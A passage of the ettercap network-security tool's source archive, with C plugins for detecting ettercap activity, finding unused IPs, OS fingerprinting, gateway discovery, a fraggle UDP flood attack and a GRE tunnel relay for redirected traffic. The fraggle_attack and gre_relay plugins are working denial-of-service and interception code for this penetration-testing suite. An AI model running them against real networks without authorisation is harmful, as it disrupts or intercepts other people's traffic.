even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include /* protos */ int plugin_load(void *); static int find_ettercap_init(void *); static int find_ettercap_fini(void *); static void parse_ip(struct packet_object *po); static void parse_icmp(struct packet_object *po); static void parse_tcp(struct packet_object *po); /* plugin operations */ struct plugin_ops find_ettercap_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "find_ettercap", /* a short description of the plugin (max 50 chars) */ .info = "Try to find ettercap activity", /* the plugin version. */ .version = "2.0", /* activation function */ .init = &find_ettercap_init, /* deactivation function */ .fini = &find_ettercap_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &find_ettercap_ops); } /*********************************************************/ static int find_ettercap_init(void *dummy) { /* variable not used */ (void) dummy; /* add the hook in the dissector. */ hook_add(HOOK_PACKET_IP, &parse_ip); hook_add(HOOK_PACKET_ICMP, &parse_icmp); hook_add(HOOK_PACKET_TCP, &parse_tcp); return PLUGIN_RUNNING; } static int find_ettercap_fini(void *dummy) { /* variable not used */ (void) dummy; /* remove the hook */ hook_del(HOOK_PACKET_IP, &parse_ip); hook_del(HOOK_PACKET_ICMP, &parse_icmp); hook_del(HOOK_PACKET_TCP, &parse_tcp); return PLUGIN_FINISHED; } /* * parse the packet for ettercap traces */ static void parse_ip(struct packet_object *po) { struct libnet_ipv4_hdr *ip; char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; ip = (struct libnet_ipv4_hdr *)po->L3.header; if (ntohs(ip->ip_id) == EC_MAGIC_16) USER_MSG("ettercap traces (ip) from %s...\n", ip_addr_ntoa(&po->L3.src, tmp)); if (ntohs(ip->ip_id) == 0xbadc) USER_MSG("ettercap plugin (banshee) is killing from %s to %s...\n", ip_addr_ntoa(&po->L3.src, tmp), ip_addr_ntoa(&po->L3.dst, tmp2)); } /* * parse the packet for ettercap traces */ static void parse_icmp(struct packet_object *po) { struct libnet_icmpv4_hdr *icmp; char tmp[MAX_ASCII_ADDR_LEN]; icmp = (struct libnet_icmpv4_hdr *)po->L4.header; if (ntohs(icmp->hun.echo.id) == EC_MAGIC_16 && ntohs(icmp->hun.echo.seq) == EC_MAGIC_16) USER_MSG("ettercap traces (icmp) from %s...\n", ip_addr_ntoa(&po->L3.src, tmp)); } /* * parse the packet for ettercap traces */ static void parse_tcp(struct packet_object *po) { struct libnet_tcp_hdr *tcp; char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; tcp = (struct libnet_tcp_hdr *)po->L4.header; switch (ntohl(tcp->th_seq)) { case EC_MAGIC_16: USER_MSG("ettercap traces (tcp) from %s...\n", ip_addr_ntoa(&po->L3.src, tmp)); break; case 6969: USER_MSG("ettercap plugin (shadow) is scanning from %s to %s:%d...\n", ip_addr_ntoa(&po->L3.src, tmp), ip_addr_ntoa(&po->L3.dst, tmp2), ntohs(po->L4.dst)); break; case 0xabadc0de: if (ntohl(tcp->th_ack) == 0xabadc0de) USER_MSG("ettercap plugin (spectre) is flooding the lan.\n"); else USER_MSG("ettercap plugin (golem) is DOSing from %s to %s...\n", ip_addr_ntoa(&po->L3.src, tmp), ip_addr_ntoa(&po->L3.dst, tmp2)); break; } if (ntohs(tcp->th_sport) == EC_MAGIC_16 && (tcp->th_flags & TH_SYN) ) USER_MSG("ettercap NG plugin (gw_discover) is trying to discover the gateway from %s...\n", ip_addr_ntoa(&po->L3.src, tmp)); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/find_ip/000775 000000 000000 00000000000 13711276346 016630 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/find_ip/find_ip.c000664 000000 000000 00000010511 13711276346 020402 0ustar00rootroot000000 000000 /* find_ip -- ettercap plugin -- Search an unused IP address in the subnet Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ /* protos */ int plugin_load(void *); static int find_ip_init(void *); static int find_ip_fini(void *); static int in_list(struct ip_addr *scanip); static struct ip_addr *search_netmask(void); static struct ip_addr *search_targets(void); /* plugin operations */ struct plugin_ops find_ip_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "find_ip", /* a short description of the plugin (max 50 chars) */ .info = "Search an unused IP address in the subnet", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &find_ip_init, /* deactivation function */ .fini = &find_ip_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &find_ip_ops); } /******************* STANDARD FUNCTIONS *******************/ static int find_ip_init(void *dummy) { char tmp[MAX_ASCII_ADDR_LEN]; struct ip_addr *e; /* variable not used */ (void) dummy; /* don't show packets while operating */ EC_GBL_OPTIONS->quiet = 1; if (LIST_EMPTY(&EC_GBL_HOSTLIST)) { INSTANT_USER_MSG("find_ip: You have to build host-list to run this plugin.\n\n"); return PLUGIN_FINISHED; } INSTANT_USER_MSG("find_ip: Searching an unused IP address...\n"); /* If one of the targets is // search in the whole subnet */ if (EC_GBL_TARGET1->scan_all || EC_GBL_TARGET2->scan_all) e = search_netmask(); else e = search_targets(); if (e == NULL) INSTANT_USER_MSG("find_ip: No free IP address in this range :(\n"); else INSTANT_USER_MSG("find_ip: %s seems to be unused\n", ip_addr_ntoa(e, tmp)); return PLUGIN_FINISHED; } static int find_ip_fini(void *dummy) { /* variable not used */ (void) dummy; return PLUGIN_FINISHED; } /*********************************************************/ /* Check if the IP is in the host list */ static int in_list(struct ip_addr *scanip) { struct hosts_list *h; LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { if (!ip_addr_cmp(scanip, &h->ip)) { return 1; } } return 0; } /* Find first free IP address in the netmask */ static struct ip_addr *search_netmask(void) { u_int32 netmask, current, myip; int nhosts, i; static struct ip_addr scanip; netmask = *EC_GBL_IFACE->netmask.addr32; myip = *EC_GBL_IFACE->ip.addr32; /* the number of hosts in this netmask */ nhosts = ntohl(~netmask); /* scan the netmask */ for (i = 1; i <= nhosts; i++) { /* calculate the ip */ current = (myip & netmask) | htonl(i); ip_addr_init(&scanip, AF_INET, (u_char *)¤t); if (!in_list(&scanip)) return(&scanip); } return NULL; } /* Find first free IP address in the user range */ static struct ip_addr *search_targets(void) { struct ip_list *i; LIST_FOREACH(i, &EC_GBL_TARGET1->ips, next) { if (!in_list(&i->ip)) return(&i->ip); } LIST_FOREACH(i, &EC_GBL_TARGET2->ips, next) { if (!in_list(&i->ip)) return(&i->ip); } return NULL; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/finger/000775 000000 000000 00000000000 13711276346 016472 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/finger/finger.c000664 000000 000000 00000015513 13711276346 020115 0ustar00rootroot000000 000000 /* finger -- ettercap plugin -- fingerprint a remote host. it sends a syn to an open port and collect the passive ACK fingerprint. Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include #include #include /* globals */ static struct ip_addr ip; static u_int16 port; static char fingerprint[FINGER_LEN + 1]; /* protos */ int plugin_load(void *); static int finger_init(void *); static int finger_fini(void *); static void get_finger(struct packet_object *po); static int good_target(struct ip_addr *ip, u_int16 *port); static int get_user_target(struct ip_addr *ip, u_int16 *port); static void do_fingerprint(void); /* plugin operations */ struct plugin_ops finger_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "finger", /* a short description of the plugin (max 50 chars) */ .info = "Fingerprint a remote host", /* the plugin version. */ .version = "1.6", /* activation function */ .init = &finger_init, /* deactivation function */ .fini = &finger_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &finger_ops); } /******************* STANDARD FUNCTIONS *******************/ static int finger_init(void *dummy) { /* variable not used */ (void) dummy; /* don't show packets while operating */ EC_GBL_OPTIONS->quiet = 1; /* wipe the global vars */ memset(&ip, 0, sizeof(struct ip_addr)); port = 0; /* * can we use EC_GBL_TARGETS ? * else ask the user */ if (good_target(&ip, &port) != E_SUCCESS) { /* get the target from user */ if (get_user_target(&ip, &port) == E_SUCCESS) { /* do the actual finterprinting */ do_fingerprint(); } } else { struct ip_list *host; /* look over all the hosts in the TARGET */ LIST_FOREACH(host, &EC_GBL_TARGET1->ips, next) { /* * copy the ip address * the port was alread retrived by good_target() */ memcpy(&ip, &host->ip, sizeof(struct ip_addr)); /* cicle thru all the specified port */ for (port = 0; port < 0xffff; port++) { if (BIT_TEST(EC_GBL_TARGET1->ports, port)) { /* do the actual finterprinting */ do_fingerprint(); } } } } return PLUGIN_FINISHED; } static int finger_fini(void *dummy) { /* variable not used */ (void) dummy; return PLUGIN_FINISHED; } /*********************************************************/ /* * sends a SYN to a specified port and collect the * passive fingerprint for that host */ static void get_finger(struct packet_object *po) { /* check that the source is our host and the fingerprint was collecter */ if (!ip_addr_cmp(&ip, &po->L3.src) && strcmp(po->PASSIVE.fingerprint, "")) memcpy(fingerprint, &po->PASSIVE.fingerprint, FINGER_LEN); } /* * check if we can use EC_GBL_TARGETS */ static int good_target(struct ip_addr *p_ip, u_int16 *p_port) { struct ip_list *host; /* is it possible to get it from EC_GBL_TARGETS ? */ if ((host = LIST_FIRST(&EC_GBL_TARGET1->ips)) != NULL) { /* copy the ip address */ memcpy(p_ip, &host->ip, sizeof(struct ip_addr)); /* find the port */ for (*p_port = 0; *p_port < 0xffff; (*p_port)++) { if (BIT_TEST(EC_GBL_TARGET1->ports, *p_port)) { break; } } /* port was found */ if (*p_port != 0xffff) return E_SUCCESS; } return -E_NOTFOUND; } /* * get the target from user input */ static int get_user_target(struct ip_addr *p_ip, u_int16 *p_port) { char input[MAX_ASCII_ADDR_LEN+1+5+1]; char ipstr[MAX_ASCII_ADDR_LEN]; memset(input, 0, sizeof(input)); /* get the user input */ ui_input("Insert ip:port : ", input, sizeof(input), NULL); /* no input was entered */ if (strlen(input) == 0) return -E_INVALID; /* get the hostname */ if (ec_strsplit_ipport(input, ipstr, p_port)) return -E_INVALID; /* convert IP string into ip_addr struct */ if (ip_addr_pton(ipstr, p_ip)) return -E_INVALID; /* correct parsing */ if (*p_port != 0) return E_SUCCESS; return -E_INVALID; } /* * fingerprint the host */ static void do_fingerprint(void) { char tmp[MAX_ASCII_ADDR_LEN]; char os[OS_LEN + 1]; int fd; /* clear the buffer */ memset(fingerprint, 0, sizeof(fingerprint)); /* convert the in ascii ip address */ ip_addr_ntoa(&ip, tmp); /* * add the hook to collect tcp SYN+ACK packets from * the target and extract the passive fingerprint */ hook_add(HOOK_PACKET_TCP, &get_finger); INSTANT_USER_MSG("Fingerprinting %s:%d...\n", tmp, port); /* * open the connection and close it immediately. * this ensure that a SYN will be sent to the port */ if ((fd = open_socket(tmp, port)) < 0) return; /* close the socket */ close_socket(fd); /* wait for the response */ ec_usleep(SEC2MICRO(1)); /* remove the hook, we have collected the finger */ hook_del(HOOK_PACKET_TCP, &get_finger); /* no fingerprint collected */ if (!strcmp(fingerprint, "")) return; INSTANT_USER_MSG("\n FINGERPRINT : %s\n", fingerprint); /* decode the finterprint */ if (fingerprint_search(fingerprint, os) == E_SUCCESS) INSTANT_USER_MSG(" OPERATING SYSTEM : %s \n\n", os); else { INSTANT_USER_MSG(" OPERATING SYSTEM : unknown fingerprint (please submit it) \n"); INSTANT_USER_MSG(" NEAREST ONE IS : %s \n\n", os); } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/finger_submit/000775 000000 000000 00000000000 13711276346 020055 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/finger_submit/finger_submit.c000664 000000 000000 00000007466 13711276346 023073 0ustar00rootroot000000 000000 /* finger_submit -- ettercap plugin -- submit a fingerprint to ettercap website Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include /* globals */ /* protos */ int plugin_load(void *); static int finger_submit_init(void *); static int finger_submit_fini(void *); /* plugin operations */ struct plugin_ops finger_submit_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "finger_submit", /* a short description of the plugin (max 50 chars) */ .info = "Submit a fingerprint to ettercap's website", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &finger_submit_init, /* deactivation function */ .fini = &finger_submit_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &finger_submit_ops); } /******************* STANDARD FUNCTIONS *******************/ static int finger_submit_init(void *dummy) { char host[HOST_LEN + 1]; char page[PAGE_LEN + 1]; char finger[FINGER_LEN + 1]; char os[OS_LEN + 1]; /* variable not used */ (void) dummy; /* don't display messages while operating */ EC_GBL_OPTIONS->quiet = 1; memset(host, 0, sizeof(host)); memset(page, 0, sizeof(page)); memset(finger, 0, sizeof(finger)); memset(os, 0, sizeof(os)); /* get the user input */ ui_input("Remote website (enter for default " DEFAULT_HOST " website) ('quit' to exit) : ", host, sizeof(host), NULL); /* exit on user request */ if (!strcasecmp(host, "quit")) return PLUGIN_FINISHED; if(!strcmp(host, "")) strcpy(host, DEFAULT_HOST); ui_input("Remote webpage (enter for default " DEFAULT_PAGE " page) ('quit' to exit) : ", page, sizeof(page), NULL); /* exit on user request */ if (!strcasecmp(page, "quit")) return PLUGIN_FINISHED; if(!strcmp(page, "")) strcpy(page, DEFAULT_PAGE); /* get the user input */ ui_input("Fingerprint ('quit' to exit) : ", finger, sizeof(finger), NULL); /* exit on user request */ if (!strcasecmp(finger, "quit") || !strcmp(finger, "")) return PLUGIN_FINISHED; ui_input("Operating System ('quit' to exit) : ", os, sizeof(os), NULL); /* exit on user request */ if (!strcasecmp(os, "quit") || !strcmp(os, "")) return PLUGIN_FINISHED; USER_MSG("\n"); /* send the fingerprint */ fingerprint_submit(host, page, finger, os); /* flush all the messages */ ui_msg_flush(MSG_ALL); return PLUGIN_FINISHED; } static int finger_submit_fini(void *dummy) { /* variable not used */ (void) dummy; return PLUGIN_FINISHED; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/fraggle_attack/000775 000000 000000 00000000000 13711276346 020156 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/fraggle_attack/fraggle_attack.c000664 000000 000000 00000006455 13711276346 023272 0ustar00rootroot000000 000000 /* * Copyright (c) Ettercap Dev. Team * * The fraggle attack plugin for ettercap. * * Written by: * Antonio Collarino (sniper) */ #include #include #include #include #include #include #define UDP_PORT_7 7 //udp echo #define UDP_PORT_19 19 //udp chargen /* prototypes */ int plugin_load(void *); static int fraggle_attack_init(void *); static int fraggle_attack_fini(void *); static EC_THREAD_FUNC(fraggler); /* globals */ struct plugin_ops fraggle_attack_ops = { .ettercap_version = EC_VERSION, .name = "fraggle_attack", .info = "Run a fraggle attack against hosts of target one", .version = "1.0", .init = &fraggle_attack_init, .fini = &fraggle_attack_fini, }; int plugin_load(void *handle) { return plugin_register(handle, &fraggle_attack_ops); } static int fraggle_attack_init(void *dummy) { struct ip_list *i; /* variable not used */ (void) dummy; DEBUG_MSG("fraggle_attack_init"); if(EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("fraggle_attack: plugin doesn't work in unoffensive mode.\n"); return PLUGIN_FINISHED; } if(EC_GBL_TARGET1->all_ip && EC_GBL_TARGET1->all_ip6) { USER_MSG("Add at least one host to target one list.\n"); return PLUGIN_FINISHED; } if(LIST_EMPTY(&EC_GBL_HOSTLIST)) { USER_MSG("Global host list is empty.\n"); return PLUGIN_FINISHED; } EC_GBL_OPTIONS->quiet = 1; INSTANT_USER_MSG("fraggle_attack: starting fraggle attack against hosts of target one.\n"); /* (IPv4) creating a thread per target 1 */ LIST_FOREACH(i, &EC_GBL_TARGET1->ips, next) { ec_thread_new("fraggler", "thread performing a fraggle attack", &fraggler, &i->ip); } /*(IPv6) creating a thread per target 1 */ LIST_FOREACH(i, &EC_GBL_TARGET1->ip6, next) { ec_thread_new("fraggler", "thread performing a fraggle attack", &fraggler, &i->ip); } return PLUGIN_RUNNING; } static int fraggle_attack_fini(void *dummy) { pthread_t pid; /* variable not used */ (void) dummy; DEBUG_MSG("fraggle_attack_fini"); while(!pthread_equal(ec_thread_getpid(NULL), pid = ec_thread_getpid("fraggler"))) { ec_thread_destroy(pid); } return PLUGIN_FINISHED; } static EC_THREAD_FUNC(fraggler) { struct ip_addr *ip; struct hosts_list *h, *htmp; u_int16 proto; u_int8 payload[8]; u_int16 port_echo, port_chargen; size_t length; DEBUG_MSG("EC_THREAD_FUNC fraggler"); ec_thread_init(); ip = EC_THREAD_PARAM; proto = ntohs(ip->addr_type); port_echo= htons(UDP_PORT_7); port_chargen= htons(UDP_PORT_19); memset(payload, 0, sizeof(payload)); length= (size_t) sizeof(payload); if((proto != AF_INET) && (proto != AF_INET6)) ec_thread_destroy(ec_thread_getpid(NULL)); LOOP { CANCELLATION_POINT(); LIST_FOREACH_SAFE(h, &EC_GBL_HOSTLIST, next, htmp) if(ntohs(h->ip.addr_type) == proto) { send_udp(ip, &h->ip, h->mac, port_echo, port_echo, payload, length); send_udp(ip, &h->ip, h->mac, port_chargen, port_chargen, payload, length); } ec_usleep(1000*1000/EC_GBL_CONF->sampling_rate); } return NULL; } ettercap-0.8.3.1/plug-ins/gre_relay/000775 000000 000000 00000000000 13711276346 017171 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/gre_relay/gre_relay.c000664 000000 000000 00000013702 13711276346 021311 0ustar00rootroot000000 000000 /* gre_relay -- ettercap plugin -- Tunnel broker for redirected GRE tunnels Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include struct ip_header { #ifndef WORDS_BIGENDIAN u_int8 ihl:4; u_int8 version:4; #else u_int8 version:4; u_int8 ihl:4; #endif u_int8 tos; u_int16 tot_len; u_int16 id; u_int16 frag_off; #define IP_DF 0x4000 #define IP_MF 0x2000 #define IP_FRAG 0x1fff u_int8 ttl; u_int8 protocol; u_int16 csum; u_int32 saddr; u_int32 daddr; /*The options start here. */ }; #ifdef WITH_IPV6 struct ip6_header { #ifndef WORDS_BIGENDIAN u_int8 version:4; u_int8 priority:4; #else u_int8 priority:4; u_int8 version:4; #endif u_int8 flow_lbl[3]; u_int16 payload_len; u_int8 next_hdr; u_int8 hop_limit; u_int8 saddr[IP6_ADDR_LEN]; u_int8 daddr[IP6_ADDR_LEN]; }; struct icmp6_nsol { u_int32 res; u_int8 target[IP6_ADDR_LEN]; }; #endif /* globals */ struct ip_addr fake_ip; /* protos */ int plugin_load(void *); static int gre_relay_init(void *); static int gre_relay_fini(void *); static void parse_gre(struct packet_object *po); static void parse_arp(struct packet_object *po); #ifdef WITH_IPV6 static void parse_nd(struct packet_object *po); #endif /* plugin operations */ struct plugin_ops gre_relay_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "gre_relay", /* a short description of the plugin (max 50 chars) */ .info = "Tunnel broker for redirected GRE tunnels", /* the plugin version. */ .version = "1.1", /* activation function */ .init = &gre_relay_init, /* deactivation function */ .fini = &gre_relay_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &gre_relay_ops); } /******************* STANDARD FUNCTIONS *******************/ static int gre_relay_init(void *dummy) { char tmp[MAX_ASCII_ADDR_LEN]; /* variable not used */ (void) dummy; /* It doesn't work if unoffensive */ if (EC_GBL_OPTIONS->unoffensive) { INSTANT_USER_MSG("gre_relay: plugin doesn't work in UNOFFENSIVE mode\n"); return PLUGIN_FINISHED; } /* don't display messages while operating */ EC_GBL_OPTIONS->quiet = 1; memset(tmp, 0, sizeof(tmp)); ui_input("Unused IP address: ", tmp, sizeof(tmp), NULL); /* convert IP string into ip_addr struct */ if (ip_addr_pton(tmp, &fake_ip) != E_SUCCESS) { INSTANT_USER_MSG("gre_relay: Bad IP address\n"); return PLUGIN_FINISHED; } USER_MSG("gre_relay: plugin running...\n"); hook_add(HOOK_PACKET_GRE, &parse_gre); hook_add(HOOK_PACKET_ARP_RQ, &parse_arp); #ifdef WITH_IPV6 hook_add(HOOK_PACKET_ICMP6_NSOL, &parse_nd); #endif return PLUGIN_RUNNING; } static int gre_relay_fini(void *dummy) { /* variable not used */ (void) dummy; USER_MSG("gre_relay: plugin terminated...\n"); hook_del(HOOK_PACKET_GRE, &parse_gre); hook_del(HOOK_PACKET_ARP_RQ, &parse_arp); #ifdef WITH_IPV6 hook_del(HOOK_PACKET_ICMP6_NSOL, &parse_nd); #endif return PLUGIN_FINISHED; } /*********************************************************/ /* Send back GRE packets */ static void parse_gre(struct packet_object *po) { struct ip_header *iph; #ifdef WITH_IPV6 struct ip6_header *ip6h; #endif /* Chek if this is a packet for our fake host */ if (!(po->flags & PO_FORWARDABLE)) return; if ( ip_addr_cmp(&po->L3.dst, &fake_ip) ) return; if ( po->L3.header == NULL) return; /* Switch source and dest IP address */ switch (ntohs(po->L3.dst.addr_type)) { case AF_INET: iph = (struct ip_header*)po->L3.header; iph->daddr = iph->saddr; iph->saddr = fake_ip.addr32[0]; /* Increase ttl */ iph->ttl = 128; break; #ifdef WITH_IPV6 case AF_INET6: ip6h = (struct ip6_header*)po->L3.header; ip_addr_cpy(ip6h->daddr, &po->L3.src); ip_addr_cpy(ip6h->saddr, &fake_ip); /* Increase ttl */ ip6h->hop_limit = 128; break; #endif default: return; } po->flags |= PO_MODIFIED; } /* Reply to requests for our fake host */ static void parse_arp(struct packet_object *po) { if (!ip_addr_cmp(&fake_ip, &po->L3.dst)) send_arp(ARPOP_REPLY, &fake_ip, EC_GBL_IFACE->mac, &po->L3.src, po->L2.src); } #ifdef WITH_IPV6 /* Reply to requests for our IPv6 fake host */ static void parse_nd(struct packet_object *po) { struct icmp6_nsol* nsol; struct ip_addr target; nsol = (struct icmp6_nsol*)po->L4.options; ip_addr_init(&target, AF_INET6, (u_char*)nsol->target); if (!ip_addr_cmp(&fake_ip, &target)) send_L2_icmp6_nadv(&fake_ip, &po->L3.src, EC_GBL_IFACE->mac, 0, po->L2.src); } #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/gw_discover/000775 000000 000000 00000000000 13711276346 017533 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/gw_discover/gw_discover.c000664 000000 000000 00000012552 13711276346 022217 0ustar00rootroot000000 000000 /* gw_discover -- ettercap plugin -- find the lan gateway it sends a syn to a remote ip with the mac address of a local host. if the reply comes back, we have found the gateway Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include /* globals */ static struct ip_addr ip; static u_int16 port; /* protos */ int plugin_load(void *); static int gw_discover_init(void *); static int gw_discover_fini(void *); static int get_remote_target(struct ip_addr *ip, u_int16 *port); static void do_discover(void); static void get_replies(struct packet_object *po); /* plugin operations */ struct plugin_ops gw_discover_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "gw_discover", /* a short description of the plugin (max 50 chars) */ .info = "Try to find the LAN gateway", /* the plugin version. */ .version = "1.0", /* activation function */ .init = &gw_discover_init, /* deactivation function */ .fini = &gw_discover_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &gw_discover_ops); } /******************* STANDARD FUNCTIONS *******************/ static int gw_discover_init(void *dummy) { /* variable not used */ (void) dummy; /* don't show packets while operating */ EC_GBL_OPTIONS->quiet = 1; /* wipe the global vars */ memset(&ip, 0, sizeof(struct ip_addr)); if (get_remote_target(&ip, &port) == E_SUCCESS) { /* do the actual finterprinting */ do_discover(); } return PLUGIN_FINISHED; } static int gw_discover_fini(void *dummy) { /* variable not used */ (void) dummy; return PLUGIN_FINISHED; } /*********************************************************/ /* * get the remote ip from user input */ static int get_remote_target(struct ip_addr *p_ip, u_int16 *p_port) { char input[MAX_ASCII_ADDR_LEN + 1 + 5 + 1]; char ipstr[MAX_ASCII_ADDR_LEN]; memset(input, 0, sizeof(input)); /* get the user input */ ui_input("Insert remote IP:PORT : ", input, sizeof(input), NULL); /* no input was entered */ if (strlen(input) == 0) return -E_INVALID; /* get the hostname */ if (ec_strsplit_ipport(input, ipstr, p_port)) return -E_INVALID; /* convert IP string into ip_addr struct */ if (ip_addr_pton(ipstr, p_ip)) return -E_INVALID; /* correct parsing */ if (*p_port != 0) return E_SUCCESS; return -E_INVALID; } /* * send the SYN packet to the target */ static void do_discover(void) { char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; struct hosts_list *h; /* convert the in ascii ip address */ ip_addr_ntoa(&ip, tmp); /* add the hook to collect tcp SYN+ACK packets */ hook_add(HOOK_PACKET_TCP, &get_replies); INSTANT_USER_MSG("\nRemote target is %s:%d...\n\n", tmp, port); LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { INSTANT_USER_MSG("Sending the SYN packet to %-15s [%s]\n", ip_addr_ntoa(&h->ip, tmp), mac_addr_ntoa(h->mac, tmp2)); /* send the syn packet */ send_tcp_ether(h->mac, &EC_GBL_IFACE->ip, &ip, htons(EC_MAGIC_16), htons(port), 0xabadc0de, 0xabadc0de, TH_SYN); } /* wait some time for slower replies */ ec_usleep(SEC2MICRO(3)); INSTANT_USER_MSG("\n"); /* remove the hook */ hook_del(HOOK_PACKET_TCP, &get_replies); } /* * collect the SYN+ACK replies */ static void get_replies(struct packet_object *po) { char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; struct hosts_list *h; /* skip non syn ack packets */ if ( !(po->L4.flags & (TH_SYN | TH_ACK)) ) return; /* the source ip is diffent */ if ( ip_addr_cmp(&po->L3.src, &ip)) return; /* this is not the requested connection */ if (po->L4.src != htons(port) || po->L4.dst != htons(EC_MAGIC_16)) return; /* search the source mac address in the host list */ LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) { if (!memcmp(po->L2.src, h->mac, MEDIA_ADDR_LEN)) { INSTANT_USER_MSG("[%s] %s is probably a gateway for the LAN\n", mac_addr_ntoa(po->L2.src, tmp2), ip_addr_ntoa(&h->ip, tmp)); } } } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/isolate/000775 000000 000000 00000000000 13711276346 016660 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/isolate/isolate.c000664 000000 000000 00000013631 13711276346 020470 0ustar00rootroot000000 000000 /* isolate -- ettercap plugin -- Isolate an host from the lan Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include /* globals */ LIST_HEAD(, 